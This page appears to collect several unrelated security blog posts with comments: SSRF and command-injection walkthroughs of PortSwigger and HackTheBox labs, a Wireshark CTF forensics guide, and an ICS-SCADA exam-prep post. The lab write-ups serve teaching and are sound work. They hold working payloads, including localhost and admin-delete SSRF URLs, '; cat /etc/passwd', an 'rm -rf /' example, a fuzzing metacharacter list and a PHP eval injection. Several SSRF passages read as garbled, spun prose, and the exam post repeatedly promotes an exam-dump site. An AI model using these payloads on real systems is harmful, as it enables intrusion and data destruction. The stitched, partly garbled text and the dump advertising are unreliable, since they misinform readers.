Introduction: The Silent Threat Lurking in Your Web ApplicationsImagine a vulnerability that allows attackers to reach into your internal network, access sensitive data, or even delete critical resourcesall by simply manipulating a URL. This isnt science fiction; itsServer-Side Request Forgery (SSRF), one of the most underrated yet dangerous vulnerabilities in modern web applications.SSRF attacks exploit trust relationships between servers, turning benign features like stock checkers or screenshot tools into weapons for attackers. In this blog, well dissect SSRF through hands-on labs and a real-world challenge, uncovering techniques likeDNS rebinding,blacklist bypasses, andopen redirect hijacking. Whether youre a bug bounty hunter, developer, or security enthusiast, youll walk away with actionable insights to exploitand defend againstthese stealthy attacks.Blackbox TestingLab 1: Basic SSRF against the local server Lab URL - https://portswigger.net/web-security/ssrf/lab-basic-ssrf-against-localhostAfter accessing the labs, after few clicks, we see an option called check stocks. Now unlike other requests in the web-site, this seems to be interesting request as its a POST request. Looking at the request we see stockApi parameter, that accepts an URL. Now what if we can change the URL to fetch some internal resource Well in that case this website is vulnerable to SSRF. Lets try it outClick on any URL like this and click on check stock and you see POST request sent to the server. Take a look on the burpsuite.https://0a2500c90385725e849b7c4a00ad000c.web-security-academy.net/product?productId=1If we change the stock API to the following options we get the access to admin panel.http://localhosthttp://127.0.0.1 Now lets go ahead an access /admin and we see if we check on pretty view option in the response, then we see exact path for deleting the carlos user.http://localhost/adminhttp://127.0.0.1/admin Visiting the endpoint we delete the user.http://localhost/admin/delete?username=carloshttp://127.0.0.1/admin/delete?username=carlosNow click on follow redirectionand once the request has been sent then we would have successfully solved the lab. Lab 2: Basic SSRF against another back-end system Lab URL - https://portswigger.net/web-security/ssrf/lab-basic-ssrf-against-backend-systemNow we are given an internal IP address of 192.168.0.1 and port number 8080. Now we can either fuzz for other ports, but here in the lab description we are asked to check for the last octet so grab a number list from 1 to 255 and fuzz the last octet on the intruder. Once we have started fuzzing, we see that last octet with value 82 returns 404 response, but despite the error, we are able to access /admin pannel. Now lets fire our repeater and access http://192.168.0.82:8080/admin. We are able to access the admin panel. Now lets repeat steps from the previous labs, click on pretty, grab the link to delete the carlos user, and with this we solve the lab.http://192.168.0.82:8080/admin/delete?username=carlosIf we access the above endpoint, we solve the lab. Just like the previous lab we get an redirect and on following the redirection we solve the lab.Lab 3: SSRF with blacklist-based input filter Lab URL - https://portswigger.net/web-security/ssrf/lab-ssrf-with-blacklist-filterIn this lab we start off with similar note, just like previous ones, and we see the post request with stock options and we see stock API. We see that localhost and 127.0.0.1 are black listed. Now we can evade these basic filters with addresses like:http://127.1/http://2130706433/The last one is the decimal representation of the IPv4 address. You can visit websites like https://www.ipaddressguide.com/ip to convert an IP address to decimial. Notice that in CTFS the second one should work but in our lab it does not work.So we go ahead with http://127.1 and we get access to admin panel. If we try and access http://127.1/admin we see an option to delete the carlos user, just click on pretty and grab the href link. If things were that simple then we there would not be fun right? we see that /admin is an blacklisted character, so in the word admin if we can double URL encode the character we get %25%36%31 and we use this character to bypass the restriction. We grab the link to delete the carlos user and now the final payload for accessing internal resource would look something like the following.http://127.1/%25%36%31dmin/delete?username=carlosOn changing the stockapi to the above URL we get an redirection and with this we are able to solve the lab.Lab 4: SSRF with filter bypass via open redirection vulnerability Lab URL - https://portswigger.net/web-security/ssrf/lab-ssrf-filter-bypass-via-open-redirectionIn this lab we see an option to view the next product at the end of each page, and once we click we see the following GET request made./product/nextProduct?currentProductId=2&path=/product?productId=3Notice the &path and we see that if we replace it with any URL this end point is vulnerable to open redirect vulnerability. Now the above endpoint makes an 302 request or redirect and if we follow along we reach this endpoint./product?productId=3Lets take this parameter and then join this parameter inside the stock API parameter and lets try and access the admin dashboard. Notice the /product?productID from redirect and the &path from above request? lets fuse both requests together and make an new parameter in stockAPI.stockApi=/product?productId=3&path=http://192.168.0.12:8080/admin/Visiting this endpoint, from the response section if we look at the source code then we see link for deleting the carlos user which is as follows./http://192.168.0.12:8080/admin/delete?username=carlosNow the final payload for the stockApi would look something like the below following.stockApi=/product?productId=3&path=http://192.168.0.12:8080/admin/delete?username=carlosWith this we should solve the lab. This was really an out of box situation, which forced me to understand how we can tamper the view next page option to get what we want. This lab opened door to crafting new http parameters and coming up with innovative ways to approach solving this lab.Whitebox Testing Lab URL - https://app.hackthebox.com/challenges/baby%2520CachedViewBaby Cached WebBelow is a revised version of your Baby Cached Web section with updated code snippets and explanations that reflect the easy challenges source code. This version also includes an engaging introduction and conclusion to improve the overall flow.Overview of the ChallengeIn this challenge, we examine a Flask web application with two main endpoints:/cache: Accepts a URL via a JSON POST request, loads the page using a headless browser (Selenium with Firefox), takes a screenshot, and caches the image./flag: Returns a secret flag image but is strictly accessible only from localhost.At first glance, the application seems secure because it enforces the following checks (as seen in CachedWeb/web_cached_web/challenge/application/util.py)URL Scheme Check The code ensures that only URLs with http or https schemes are allowed. if scheme not in ['http', 'https']: return flash('Invalid scheme', 'danger')Internal IP Check When processing the request the application first uses socket.gethostbyname to resolve the domain then confirms the obtained IP address does not belong to internal ranges starting with 127.0.0.0/8 and 10.0.0.0/8. def ip2long(ip_addr): return struct.unpack('!L', socket.inet_aton(ip_addr))[0] def is_inner_ipaddress(ip): ip = ip2long(ip) return ip2long('127.0.0.0') >> 24 == ip >> 24 or \ ip2long('10.0.0.0') >> 24 == ip >> 24 or \ ip2long('172.16.0.0') >> 20 == ip >> 20 or \ ip2long('192.168.0.0') >> 16 == ip >> 16 or \ ip2long('0.0.0.0') >> 24 == ip >> 24 if is_inner_ipaddress(socket.gethostbyname(domain)): return flash('IP not allowed', 'danger')Localhost Protection for /flag A decorator in util.py ensures that only requests originating from 127.0.0.1 and without a referrer can access the /flag endpoint. def is_from_localhost(func): @functools.wraps(func) def check_ip(*args, **kwargs): if request.remote_addr != '127.0.0.1' or request.referrer: return abort(403) return func(*args, **kwargs) return check_ip The route then uses this decorator. This can be found inside CachedWeb/web_cached_web/challenge/application/blueprints/routes.py @web.route('/flag') @is_from_localhost def flag(): return send_file('flag.png')The Vulnerability: DNS Rebinding + TOCTOUThe image from the source code reveals us a major hints on what this application might be vulnerable to. The application suffers from a DNS rebinding attack and a acrid Time-of-Check to Time-of-Use (TOCTOU) race condition despite its security safeguards. Heres why:Initial DNS Resolution Check The cache_web function employs socket.gethostbyname(domain) to find the domain resolution while ensuring no internal IP addresses remain pointed to it. The DNS check happens once when the URL is still in possession of the system prior to Selenium receiving it. Separate DNS Resolution by Selenium The browser runs separate DNS queries when the instruction driver.get(url) activates in the serve_screenshot_from function. Attackers who exploit DNS rebinding can fool the first IP address check of Selenium even though they redirect domain resolution later to 127.0.0.1 and internal network addresses. TOCTOU Window The period between the DNS check at time-of-check and the actual browser request at time-of-use allows attackers to create a race condition. The window between discussions allows hackers to modify DNS records and send traffic to a server at 127.0.0.1 or internal endpoint /flag.DNS Rebinding Explained (in Simple Terms):DNS Rebinding: A website obtains deception through altering its IP address after initial computer acceptance.Runtime security platforms recognize DNS rebinding as a technique explained by Wikipedia to circumvent the same-origin policy through unexpected domain IP address resolution by browsers.TOCTOU Race Condition Explained:TOCTOU (Time-of-Check to Time-of-Use): Such condition arises when testing a status requires a noticeable duration before applying its results. The system operates on outdated or manipulated data since a change occurs within the defined interval such as a DNS response.When checking door locks to leave a space remains it would be helpful to confirm security status first. Your assumption about security becomes invalid when the locking condition changes between your check and someone else accessing the lock. DNS changes between when the browser conducts checks and makes its request provide the attacker with a potential period of access.Exploitation Steps:Craft a Malicious URL: The attacker conducts the IP check with a DNS rebinding service that points to an initially safe IP address but this service later redirects to 127.0.0.1 just before Selenium executes the URL. Bypass the IP Check: The DNS lookup operated from cache_web takes place at a time when it fails to detect the IP address change because of which the IP check successfully finishes. Trigger the TOCTOU Vulnerability: An internal target becomes the domain resolution point after Selenium completes its domain retrieval process. Through this method the attacker achieves access to the protected endpoint that resides at /flag.Getting the flagWe will first find the googles IP address to rebind the local host address. We can use the nslookup command to find googles IP address nslookup google.com Server: 127.0.0.53 Address: 127.0.0.53#53 Non-authoritative answer: Name: google.com Address: 142.250.195.110 Name: google.com Address: 2404:6800:4007:81b::200eNow we will use a website like https://lock.cmpxchg8b.com/rebinder.html to perform rebinding attack. Copy the address and paste it in the input box several times till we trigger the race condition and get the flag. Ideally 3 times should be enough but keep doing until we get the flaghttp://7f000001.8efac36e.rbndr.us/flag The Baby Cached Web challenge illustrates how even seemingly robust SSRF defenses can be undermined through DNS rebinding and TOCTOU race conditions. By exploiting the gap between the initial DNS check and the subsequent browser request, an attacker can manipulate the DNS resolution to access internal endpoints intended to be protectedlike retrieving the secret flag image. This challenge serves as a powerful reminder that security measures must consider dynamic network behaviors, not just static input validationFinal Words: Turning Knowledge Into DefenseSSRF isnt just a vulnerabilityits a gateway to your internal infrastructure. From bypassing blacklists with127.1to weaponizing DNS rebinding, weve seen how attackers pivot from simple URL parameters to full-scale breaches.Key Takeaways:Always validate and sanitize user-supplied URLs. Assume localhost restrictions can be bypassed; enforce strict allowlists. Monitor DNS resolution gaps in TOCTOU-prone workflows.To mitigate against these attacks feel free to refer these reference links to understand and to defend better against SSRF attacks# How to prevent SSRF Attacks in Node.js[](https://www.youtube.com/@Snyksec)# What functionalities are vulnerable to SSRFs? Case study of 124 bug bounty reports[](https://www.youtube.com/@BugBountyReportsExplained)https://medium.com/@ajay.monga73/defending-against-ssrf-understanding-detecting-and-mitigating-server-side-request-forgery-f2d1fd62413d [Has some good java code snippets]To sum up here are some of the defences you can start implementing in your web application to stay protected against attacks like SSRF.Input Validation & Sanitization Users must submit valid URLs through the schema validation library Zod to maintain proper check parameters. The validation schema features one requirement for strings that need to adopt valid URL properties and restrict access to HTTPS protocol usage. The system should block all inputs that do not conform to valid URL structures or permitted schemas including file:// and ftp://. Implementation: const urlSchema = z.string().url().startsWith("https://");try { urlSchema.parse(userInput); } catch (e) { blockRequest(); }The parsing system enables Zod to detect invalid input through structured error reporting so that it prevents SSRF attacks by authorizing sanitized URLs with valid protocols. Enforce URL Schemas The Zod function startsWith("https://") enables HTTPS protocol protection to block all domains lacking HTTPS prefixes. The measure prevents security risks from internal protocol handlers that could enable them to access local files through commands (such as file://). The system should reject URLs containing encoded characters like %0D%0A for CRLF injection through regulation patterns and normalization techniques. Domain Allowlisting The implementation phase should use a fixed list of trusted domains which includes the entry "api.unsplash.com". A security check involving URL.hostname extraction with strict comparison should validate all URLs against the list of trusted domains. Code Example: const userHost = new URL(userInput).hostname;if (!trustedDomains.includes(userHost)) throw Error("Untrusted domain");Such security controls require connectivity to configuration management systems including Consul or databases to maintain optimal lookups for dynamic address registration. Web Application Firewalls (WAF) Cloud-based WAFs including AWS WAF or Cloudflare should monitor and block requests directed to internal IP ranges (RFC 1918) and loopback addresses (127.0.0.1 and AWS/GCP metadata endpoints (169.254.169.254). Rulesets: A. The WAF system should block all requests that have a Host header which resolves to any internal IP address. B. WAF systems should detect unauthorized SSRF patterns that appear as localhost or admin.internal. C. Can limit the number of URL requests to prevent scanning activities through endpoint rates. Dependency Management The implementation of Snyk or Dependabot as tools for automating vulnerability scans should be integrated. The system must detect outdated is-url versions that contain ReDoS vulnerabilities and automatically force upgrades to new versions. Pipeline Integration: # CI/CD stepsnyk test && snyk monitorAudit libraries that manage network operations need evaluation to prevent default settings such as following redirected connections which pose risks to third-parties. TOCTOU Mitigation The DNS Rebinding defense resolves the domain to an IP during validation after which the same IP can be reused for subsequent requests. The server should store obtained IP addresses in temporary cache to defend against attackers who could change DNS records after validation completion. Code Snippet: const resolvedIP = dns.resolve(userHost);if (isInternalIP(resolvedIP)) blockRequest();// Use resolvedIP for the actual fetch, not the user-provided URLfetch(`https://${resolvedIP}/path`)Network Hardening The application server should not reach backend services such as databases or metadata APIs which must reside within separate private subnets. Egress Controls: Restrict outbound traffic from the Node.js process to only necessary domains/IPs via firewall rules (e.g., iptables, cloud security groups). Ready to test your skills? Test the laboratories by hand and do not underestimate the defensive power of paranoia during your SSRF defenses. You should combine curiosity with ethical breakage of systems while building multiple security layers to protect yourself.

0xM5awy thanks for the valuable content my friend. Cheers!

Welcome back to our CTF Forensics series! In this second installment, we continue our deep dive into network forensics using Wireshark. If youve ever struggled with analyzing packet captures in CTF challenges, this guide will help you master essential techniques, from filtering traffic to extracting hidden data. Lets sharpen our skills and uncover those elusive flags together!Understanding PCAP FilesMost CTF challenges involving Wireshark provide a .pcap (packet capture) file, which contains recorded network traffic. Your task is to analyze this file and extract valuable information such as credentials, hidden messages, or files transferred over the network.Common Wireshark Techniques for CTFFollowing TCP and UDP StreamsReconstructing conversations between two parties is crucial in CTF challenges. To view the complete exchange of messages:Right-click on a packet > Click "Follow" > Select "TCP Stream" or "UDP Stream"This allows you to see plaintext communication, credentials, and other useful information.Extracting Files from PCAPSometimes, the challenge involves reconstructing transferred files. Wireshark can extract files from network traffic: **File** > **Export Objects** > Select the protocolChecking for Hidden Data in ProtocolsSteganography techniques can hide data inside protocols like ICMP, DNS, or HTTP headers.Look for anomalies in packet payloads using hex view.Use tshark or scripts to extract and decode hidden messages.Decrypting WPA or WEP TrafficFilter the protocol:eapolIf you plan to crack a WPA/WPA2 network, look for the 4-way handshake. This handshake occurs when a client connects to an access point. You can filter for EAPOL (Extensible Authentication Protocol over LAN) packets in Wireshark using the filter.Wifi Cracking ToolUse aircrack-ng to attempt cracking the WPA/WPA2 handshake:aircrack-ng -w [wordlist.txt] -b [BSSID] [handshake.pcap]Protocol Hierarchy in WiresharkWiresharks Protocol Hierarchy feature provides a structured breakdown of all protocols present in a packet capture file, helping analysts understand the composition of network traffic. This tool categorizes traffic into different protocol layers, such as Ethernet, IP, TCP, HTTP, and more, making it easier to detect anomalies, filter relevant data, and identify suspicious activity. In CTF challenges, this feature is useful for quickly spotting uncommon or hidden protocols that might contain valuable clues or even the flag itself. By analyzing protocol distribution, you can determine whether a capture contains encrypted traffic, tunneling, or unexpected services.Statstic > Protocol HierarchyKey Points on Protocol HierarchyProvides a percentage breakdown of network protocols used in a capture.Helps in detecting unusual or hidden protocols used for covert communication.Assists in refining filtering techniques for faster packet analysis.Useful for spotting encrypted traffic, tunneling, or rare services.NetworkMinerNetworkMiner is a powerful network forensic analysis tool (NFAT) designed to extract useful artifacts from packet capture (PCAP) files. Unlike Wireshark, which focuses on packet-level analysis, NetworkMiner simplifies forensic investigations by automatically extracting files, images, credentials, and other useful metadata from captured traffic. This makes it a valuable tool for CTF challenges, especially when dealing with network-based challenges that involve reconstructing communication or retrieving transferred files.File Extraction Extracts transferred files (images, docs, executables) from PCAPs.Credential Recovery Automatically finds usernames and passwords from plaintext protocols (HTTP, FTP, Telnet).Host Analysis Identifies IP addresses, MAC addresses, and communication details.Image & Data Recovery Recovers images and possible steganographic content.DNS Analysis Reveals queried domains, useful for tracking exfiltration or hidden messages.Passive Forensics Works without actively interacting with the traffic.Quick Artifact Discovery Saves time by categorizing extracted data into easy-to-navigate tabs.Installation for Windows and LinuxWindowsDownload Link - https://www.netresec.com/?page=NetworkMinerFrom the above download link u can download and unzip the file .Its Portable version .LinuxSame download link can be used to download here . Here the .exe file will be used with mono for installation .Install Mono Frameworksudo apt update && sudo apt install mono-complete -yNow Download NetworkMiner from the link -Network MinerExtract the Files and move the folder to /opt/unzip <file name> -mv /opt/cd /opt/NetworkMinerMake the executable permission for the NetworkMiner.exe filesudo chmod +x NetworkMiner.exeNow run the file using monomono /opt/NetworkMiner_1-2/NetworkMiner.exeCheck Out the old blog on Steganography Stay tuned for next Part !!!

Passing the EC-Council ICS-SCADA (Industrial Control Systems - Supervisory Control and Data Acquisition) exam on your first attempt requires a well-structured preparation strategy, the right resources, and consistent effort. Heres how I did it, along with tips and resources to help you succeed.Preparation Tips1. Understand the Exam ObjectivesFamiliarize yourself with the official EC-Council ICS-SCADA exam blueprint.Focus on key areas such as ICS-SCADA fundamentals, network protocols, threat modeling, vulnerability assessment, and incident response.2. Create a Study PlanDedicate 2-3 hours daily for at least 4-6 weeks.Break down the syllabus into manageable sections and allocate time for each topic.3. Hands-On PracticeSet up a virtual lab environment to practice ICS-SCADA concepts.Use tools like Wireshark, Nessus, and Metasploit to simulate real-world scenarios.4. Take Notes and ReviseSummarize key concepts in your own words for quick revision.Use flashcards for memorizing protocols, ports, and attack vectors.5. Practice with Mock ExamsSimulate the exam environment by taking timed practice tests.Analyze your performance and focus on weak areas.6.Join Online CommunitiesParticipate in forums like Reddit, TechExams, or EC-Councils official community to discuss doubts and share resources.ResourcesTo ace the ICS-SCADA exam, you need reliable and up-to-date study materials. Here are the resources I used:1. Official EC-Council Study GuideThe official guide covers all exam topics in detail and is a must-have resource.2. Online CoursesPlatforms like Udemy, Coursera, and Cybrary offer ICS-SCADA-specific courses.Look for courses with hands-on labs and practical exercises.3. BooksIndustrial Network Security: Securing Critical Infrastructure Networks by Eric D. Knapp and Joel Thomas Langill.Cybersecurity for Industrial Control Systems: SCADA, DCS, PLC, HMI, and SIS by Tyson Macaulay.4. Practice TestsPractice tests are crucial for understanding the exam format and identifying weak areas.Use platforms like Boson, Exam-Labs, and Killerdumps for high-quality practice questions.5. KillerdumpsThis plat form has been a trusted resource for over 7 years, providing the best study material for certification exams.Their ICS-SCADA exam questions are highly accurate and closely aligned with the actual exam.The platform offers detailed explanations for each question, helping you understand the concepts thoroughly.Many candidates, including myself, have found this platform to be an invaluable resource for passing the exam on the first attempt.6. Virtual LabsUse platforms like Hack The Box or TryHackMe to practice penetration testing and vulnerability assessment in a controlled environment.7. YouTube TutorialsChannels like John Hammond, The Cyber Mentor, and NetworkChuck offer free tutorials on ICS-SCADA and related topics.Final TipsStay consistent with your preparation and avoid last-minute cramming.Focus on understanding concepts rather than memorizing answers.Use Killerdumps for reliable ICS-SCADA exam questions and practice tests to build confidence.On exam day, read each question carefully and manage your time effectively.With the right preparation and resources, passing the EC-Council ICS-SCADA exam on your first attempt is absolutely achievable. Good luck!

Awesome

Command injection is a critical vulnerability that enables attackers to execute unauthorized commands on a system. In this blog, well explore both whitebox and black box approaches for detecting and these risks. Join us as we break down effective strategies to detect this vulnerability in your infrastructure. Before we dive into this topic we must understand what is a shell metachracter and what is a payload in terms to command injection.Shell Metacharacters (Cybersecurity POV, With Example)In Linux, we use ls ; whoami to execute both commands sequentiallyls lists files, and whoami reveals the current user. Similarly, in command injection, attackers exploit shell metacharacters to sneak malicious payloads alongside valid HTTP parameters without breaking the applications expected functionality. For example, if an app executes ping 127.0.0.1, an attacker could send ping 127.0.0.1 ; cat /etc/passwd to execute both commands while keeping the original request intact.Definition of PayloadThe payload consists of shell metacharacters (&, &&, |, ||, ;, \n, >, <, $()) and their URL-encoded versions (%26, %26%26, %7C, %7C%7C, %3B, %0A, %3E, %3C, %24%28%29). These characters are used to chain, execute, and manipulate commands, making them essential for testing and exploiting command injection vulnerabilities.Black Box approachTo begin with blackbox refers to scenario where we dont have access to source code and in whitebox testing we have access to source code. Now the following slide from Rana Khalil is extremely useful in understanding the black box approach. 1. OS command injection, simple caseLab URL - https://portswigger.net/web-security/os-command-injection/lab-simpleFirst we fuzz for valid shellmeta-chracters that the application takes as input. You may use the following custom wordlist and fuzz along side each input parameters to find the shell metachracter that is accepted. This wordlist contains URL encoded values as well./home/mccleod/custom via v3.8.10 took 12s cat shell-metachracters.txt & && | || ; \n > < $() %26 %26%26 %7C %7C%7C %3B %0A %3E %3C %24%28%29Now in the application, we click on every possible clicks, and we see an interesting option called check stock, and behind the scenes we notice that this is an POST request. Now lets fuzz for shell metacharacters along side productId and storeId, and see what happens. Add payload insertion points in the following area, and make sure you have selected battering ram attack option. Make sure you copy and paste payloads from shell-metacharacters.txt. And start your attack. We see couple of interesting responses. /n and$() return numbers like 32 and 42 and the $ character does not return much anything but at same time does not give errors like the rest of the metacharacters. Note that do not do this mistake of entering payload at two points in a single instance. Why because what if productId is not vulnerable but storeId is? in that case we have to separately fuzz for each point, as a rule of thumb remember always fuzz one parameter or one endpoint at a time.We see interestingly ; character gives us insight of an shell script and interesting details like the location of the script. The same holds true even ; character is URL encoded. Finally after a lot of trail and error we see that payloads with metacharacters like %oa, | and ; work in the payload. Even the url -encoded ones work well in this lab With this we solve the lab. But remember when we fuzzed with ; value as input, we found the location of an shell script? Lets take an look at the script for better understanding on why this command injection vulnerability arises. Now if we use cat linux command to have a look at stockreport.sh then we see that eval function is used. Using eval on unsanitized input allows arbitrary code execution, enabling an attacker to inject and execute malicious commands.2.Lab: Blind OS command injection with time delaysLab URL : https://portswigger.net/web-security/os-command-injection/lab-blind-time-delaysNow this lab is very much similar to previous one, this labs acts like an good reinforcement for the things and methodology we have learnt from the previous lab.Step 1: Click all button and look for interesting requests and/or endpoints.Step 2: Once the endpoint is found, now fuzz all input field with shell-metachracters to find which one will work.Step 3: Once you find the valid shell metachracter like | or ; now its time to test for command injection. Try with payloads like ;whoami or |whoamiStep 4: Since this lab has something to do with time delays, we try some commands like sleep or pinging localhost that way this entire thing runs on loops. sleep 10ping -c 127.0.0.1Now looking at burp suite, unlike previous lab we dont have check stock but on to our right hand top corner, we see something called submit a feedback. Lets try that out With trial and error, we find that email parameter is vulnerable to command injection. But something is very wrong and is not working. Even if we URL-ENCODE the characters like ; sleep 10 or | sleep 10 then we are not still getting the delay.Remember we used delimited in sql injection to comment out the errors from the sql syntax which we give as input? In command injection we can use # or the hash symbol to comment out the errors. When we use # and url encode it with ctrl+u then we get time delay for 10 seconds which solves our lab. 3. Blind OS command injection with output redirectionLab URL - https://portswigger.net/web-security/os-command-injection/lab-blind-output-redirectionSome of you who will read this section might feel like this is CTFish, or you might even ask whats the point of output redirection if I can execute my command directory in to the server? Well you got a point, and the only reason I have included this is because it forced me to think out side of the box, and made me wonder can we take command injection beyond simply executing arbitrary commands on the server? Well the answer is yes ,and in this lab we are going to execute our command, redirect the output of the commend to a text file and via LFI or local file inclusion we are going to read output. Let that sink in for a moment and if this sounds too bizarre then by the end of this section I hope it is clear.On the first glances, we see an feedback form similar to last or previous exercise. Now we can fuzz for metachracters like |, ||, ; etc, and on each parameter, and we see that in name parameter if we try something like ;whoami or |whoami server responds with message could not save. Since we dont have access to the source code, our best bets is to consider that the application might be configured in a way where output is not displayed, unless saved. Recall that you can use > operator or >> in linux to save output to a text file, lets do that here as well. Still we are getting the same error. We have redirected the output to /var/www/images which is given at the lab description and we are creating a new file called output.txt and note that > creates an new text file.Now lets use # delimiter for commenting out errors. We are still getting the error, therefore our last resort is to encode things with URL so that the server understands and responds well. You can use ctrl+u to URL decode on burp suite. Now we see that our payload gets processed well and in case if there is any error just reset or restart the lab. Feel feel to try other shell metacharacters like & and so on. Now how are we going to retrieve or get the file?Well lets look round the webpage, we see a lot of images, if we right click and view the image the URL becomes something like the following below.https://0a3c008f04204dc4821d792b006b008e.web-security-academy.net/image?filename=7.jpgDo you see the parameter ?filename=7.jpg? what if we change the 7.jpg to output.txt? Will we be able to get files from that specific directory which is /var/www/images? Lets try that out. When we change the filename to output.txt we see the output for whoami command and with this we solve the lab. White box approach1. Looking GlassLab URL - https://app.hackthebox.com/challenges/looking%20glass/At first glances are are given an website that pings IP address, and notice how realistic the output for ping is, it feels like exactly as if ping command is executed on linux machine and the output is displayed. If ping command can be executed then what if other linux command might be executed by the server? Well lets try it with the following command.10.30.18.29; ls ../We see that the with basic shell metacharacter we are able to execute any linux command. So lets not quickly waste time and get the flag. We can use cat command to read out the flag for us.10.30.18.29; cat ../flag_b1ubZWith this we get our flag. But things are not so fun, we just got flag by basic linux command, that is definitely not interesting. Source Code AnalysisSince we can execute commands, lets have a look at what other files are present in the directory in which we are present.10.30.18.29; lsWe see a file called index.php and lets read the source code. Now with the help of following command we can directly read our index.php file.10.30.18.29; cat index.phpWith the above command we get source code to index.php. Our eyes are fixated on runTest function which looks exactly like the following lines.function runTest($test, $ip_address){ if ($test === 'ping') { system("ping -c4 ${ip_address}"); } if ($test === 'traceroute') { system("traceroute ${ip_address}"); }}The PHP code is vulnerable to command injection in both its ping and traceroute features because it uses unsanitized user input directly in shell commands. Specifically, the runTest function takes the user-controlled value from $POST[ip_address] and inserts it without any filtering into commands like system("ping -c4 ${ip_address}") and system("traceroute ${ip_address}"). This lack of validation or sanitization means that an attacker could append shell operators (such as ;, &&, or |) to the ip_address input to run arbitrary commands (for example, 8.8.8.8; rm -rf /). Additionally, although the input field is pre-filled with the users IP address via <?= getUserIp() ?>, it remains editable, allowing anyone to change it to a malicious value.2. TimeKORPLab URL - https://app.hackthebox.com/challenges/TimeKORPNow before we dive into technicalities lets have a look at possible payloads that work.'+%0a+cat+/flag+%0a+''%3b+cat+/flag+||+''%3b+cat+/flag+%3b+%23''%3b+cat+/flag+%3b'Logic for this payload is based on the source code. To sum up simply payload consists of the following things[singlequote][space][shell-metacharacter][space]cat /flag[space][shellmetacharacter][singlequote]Now lets deep dive into the source code to understand why things work and why we have come up with this payload. Do remember even if this challenge is labelled as very easy, it gets tricky, and some of the shell metacharacters like & may not work. Whats more worse is ls and other linux command might not give anything meaningfulNow the source code for this challenge is no longer on the hackthebox platform but Cryptocat breaks it down for us. Feel free to check out his youtube video. Source Code AnalysisIn TimeController.php:$format = isset($_GET['format']) ? $_GET['format'] : '%H:%M:%S';$time = new TimeModel($format);In TimeModel.php:public function __construct($format){ $this->command = "date '+" . $format . "' 2>&1";}public function getTime(){ $time = exec($this->command); return isset($time) ? $time : '?';}After glancing at TimeController.php and TimeModel.php we come to following conclusion:Direct User Input in Shell Command: The user-supplied format parameter is concatenated directly into a shell command.Shell Command Execution: The code uses PHPs exec() function to run the command, forming date '+[user_input]' 2>&1.How the Exploit WorksWhen an attacker sends a payload like +%0a+cat+/flag+%0a+: %0a represents a newline. The command becomes:date '+cat /flag' 2>&1Similarly, payloads like ; cat /flag ; inject additional commands using ; as a separator.Although the injection might succeed, Permission denied errors occur because the web app runs under restricted permissions, preventing access to sensitive files.This is a classic command injection vulnerability (CWE-78) caused by insufficient input sanitization and validation.3. LoveTokLab URL - https://app.hackthebox.com/challenges/LoveTok/walkthroughsNow we have format parameter in this application and we have come up with unique payload by understanding the source code. First lets have a look at the payload. Then we will deep dive into the inner mechanics/?format=${system($_GET[1])}&1=whoami${system($_GET[cmd])}&cmd=ls / We see that despite the error, we were able to execute commands like whoami successfully into the web application. Source Code AnalysisWe are given zip code for this application and there are four main php pages that grab our attention and they are:a. TimeModel.phpclass TimeModel{ public function __construct($format) { // The format string is sanitized by addslashes $this->format = addslashes($format); // A time offset string is built using random values. [ $d, $h, $m, $s ] = [ rand(1, 6), rand(1, 23), rand(1, 59), rand(1, 69) ]; $this->prediction = "+${d} day +${h} hour +${m} minute +${s} second"; } public function getTime() { // The critical part: eval() is used to build a date string eval('$time = date("' . $this->format . '", strtotime("' . $this->prediction . '"));'); return isset($time) ? $time : 'Something went terribly wrong'; }}Whats happening here in the above piece of code?Input Handling: The constructor accepts a $format parameter. It uses addslashes() to escape certain characters (e.g., quotes, backslashes). However, escaping with addslashes() is not enough when the input is later used in an eval() context.Dynamic Code Construction: In getTime(), the code builds a PHP statement that calls date(). It concatenates the (escaped) format string directly into the code string and then passes it to eval().Risk: Because eval() executes its input as PHP code, any code injection in $format will be executed on the server.b. TimeController.phpclass TimeController{ public function index($router) { // Directly taking a GET parameter and passing it to TimeModel $format = isset($_GET['format']) ? $_GET['format'] : 'r'; $time = new TimeModel($format); return $router->view('index', ['time' => $time->getTime()]); }}Whats happening here in the above piece of code?The controller takes the format parameter from the URL (i.e., user input) and passes it directly to the TimeModel without further sanitization.This means an attacker can supply a malicious string in the format parameter.c. index.php and Router.php// index.php snippet:date_default_timezone_set('UTC');spl_autoload_register(function ($name){ if (preg_match('/Controller$/', $name)) { $name = "controllers/${name}"; } else if (preg_match('/Model$/', $name)) { $name = "models/${name}"; } include_once "${name}.php";});$router = new Router();$router->new('GET', '/', 'TimeController@index');$response = $router->match();die($response);Whats happening here in the above piece of code?The file sets up autoloading for classes, defines a basic route (mapping the root URL / to TimeController@index), and then processes the request. There is no additional sanitization herethe vulnerability propagates from the user input all the way down into the TimeModel.2. How the Exploit Payload WorksThe payload given is:/?format=${system($_GET[1])}&1=whoamiLets break it down:a. The Payload Componentsformat parameter: The value passed is ${system($_GET[1])} In the context of the code, after addslashes(), the value still ends up inside a string that is eventually passed to eval(). 1 parameter: This parameter is set to whoami. It is accessed within the injected code via $_GET[1]. b. Injection MechanicsString Creation: The user-supplied format parameter (after addslashes()) remains essentially ${system($_GET[1])}. Even though some characters are escaped, the dangerous code is still there. Using eval(): When eval() is called, it builds and executes a PHP statement that looks like:$time = date("${system($_GET[1])}", strtotime("..."));Because the string is double-quoted, PHP processes the ${...} syntax, executing the code inside it. Code Execution: The expression ${system($_GET[1])} triggers the system() function with the parameter $_GET[1]. Since the URL provides &1=whoami, it executes system("whoami"). Result: The output of the whoami command is displayed, proving that arbitrary commands can be executed on the server.3. Why addslashes() Fails HerePurpose of addslashes(): This function is designed to escape quotes and backslashes so that strings can be safely used in contexts like database queries (preventing simple SQL injection). Inadequacy for eval(): addslashes() does not neutralize PHP code when that code is later executed by eval(). The dangerous parts (e.g., ${...} syntax for variable and function calls) are not removed. As such, even after escaping, the malicious string still results in executable PHP code within the eval() call.Where to go from here?One thing that you can do is to start doing these challenges along side as you are reading blog, and if you are someone who have already done most or all of these challenges then feel free to try a challenge called hsa from hackthebox which revolves around understanding the source code, and we have to apply the concept of command injection via output redirection which we have learnt from lab 3. One of the common questions that I struggled with is how much programming or coding is required in cybersecurity? and some say we dont but if you are planning to do web application pentesting, then learning to review and find vulnerabilities in source code is an valuable skill. That being said if definitely helps to come or have an developer background, but does not have to be always the case. Atleast one should be familiar with reading of code and understanding what is happening under the hood, or at bare minimum one should be willing to dig into the bits of code and deepen ones understanding using google, youtube and chatgpt. Stay tuned for more interesting blogs in which we will deep dive on each vulnerabilities.

